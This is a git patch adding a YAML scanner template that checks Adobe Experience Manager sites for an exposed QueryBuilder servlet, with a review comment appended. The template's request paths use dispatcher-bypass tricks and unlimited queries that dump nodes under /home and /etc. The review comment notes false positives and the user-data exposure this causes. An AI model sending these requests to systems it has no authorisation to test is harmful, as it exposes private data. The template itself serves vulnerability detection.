From a395f7cd604c78dbea0e4804a80a7e038ee957d3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 5 Apr 2021 23:12:25 +0530
Subject: [PATCH] Create aem-querybuilder-internal-path-read.yaml
---
.../aem-querybuilder-internal-path-read.yaml | 25 +++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
diff --git a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
new file mode 100644
index 0000000000..5641c2e549
--- /dev/null
+++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@@ -0,0 +1,25 @@
+id: aem-querybuilder-internal-path-read
+
+info:
+ author: DhiyaneshDk
+ name: AEM QueryBuilder Internal Path Read
+ severity: medium
+ reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+ tags: aem
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - jcr:path
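Review bot: The word matcher at the end of the hunk fires on any 200 response whose body contains `jcr:path`, so an error page or a help page that merely echoes that string would be reported as an exposed QueryBuilder. Requiring a second token from the QueryBuilder JSON envelope would cut false positives, for example adding `- '"hits"'` under `words:` together with `part: body` and `condition: and` (confirm the envelope key against a real response). Separately, all four paths send `p.hits=full&p.limit=-1`, which asks the server for every node under `/home` and `/etc`; `p.limit=1` is enough to confirm the exposure and keeps user-profile data out of scan output while putting less load on the scanned instance. The `info` block also has no `description` telling the operator what a hit means and that the fix is to restrict the QueryBuilder servlet at the dispatcher.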